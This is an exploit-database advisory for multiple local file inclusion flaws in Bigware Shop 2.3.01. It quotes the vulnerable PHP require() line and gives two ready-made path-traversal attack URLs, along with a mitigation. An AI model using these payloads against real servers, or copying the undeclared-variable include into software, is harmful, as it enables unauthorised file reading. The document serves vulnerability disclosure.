Bigware Shop 2.3.01 Multiple Local File Inclusion Vulnerabilities

vendor:

Bigware Shop

by:

bd0rk

7,5

CVSS

HIGH

Local File Inclusion

CWE

Product Name: Bigware Shop

Affected Version From: 2.3.01

Affected Version To: 2.3.01

Patch Exists: NO

Related CWE: N/A

CPE: a:bigware:bigware_shop

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: Ubuntu-Linux

2012

Bigware Shop 2.3.01 Multiple Local File Inclusion Vulnerabilities

The Bigware Shop 2.3.01 application is vulnerable to Local File Inclusion due to the $language parameter not being declared. An attacker can exploit this vulnerability by sending a crafted HTTP request containing a malicious file path in the language parameter. This will allow the attacker to read sensitive files from the server.

Mitigation:

Declare the $language parameter before requiring it.

Source

Exploit-DB raw data:

# Title: Bigware Shop 2.3.01 Multiple Local File Inclusion Vulnerabilities
# Author: bd0rk
# eMail: bd0rk[at]hackermail.com
# Twitter: twitter.com/bd0rk
# Tested on: Ubuntu-Linux
# Vendor: http://www.bigware.de
# Download: http://www.bigware.de/download/bigware_software_-_vollversion/Bigware_Shop.zip


Proof-of-Concept1:

/Bigware_Shop/modules/basic_pricing/configmain/main_bigware_12.php source-line 58
**********************************************************************
require ( dirname(dirname(__FILE__)).'/language/'.$language.'.php');
**********************************************************************

[+]Sploit1: http://[target]/Bigware_Shop/modules/basic_pricing/configmain/main_bigware_12.php?language=/../../../../yourFILE.php

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~


Proof-of-Concept2: 

/Bigware_Shop/modules/basic_pricing/configmain/main_bigware_115.php source-line 56
*********************************************************************
require ( dirname(dirname(__FILE__)).'/language/'.$language.'.php');
********************************************************************* 

[+]Sploit: http://[target]/Bigware_Shop/modules/basic_pricing/configmain/main_bigware_115.php?language=/../../../../yourFILE.php


=> Vuln-Description: The $language-parameter isn't declared. So an attacker can readin'.
=> Vendor-Solution: Please declare this parameter before require. 



***Greetings fr0m Germany: zone-h.org-Team, exploit-db.com, GoLd_M, Kim Dotcom***

MERRY CHRISTMAS BRO'S! :)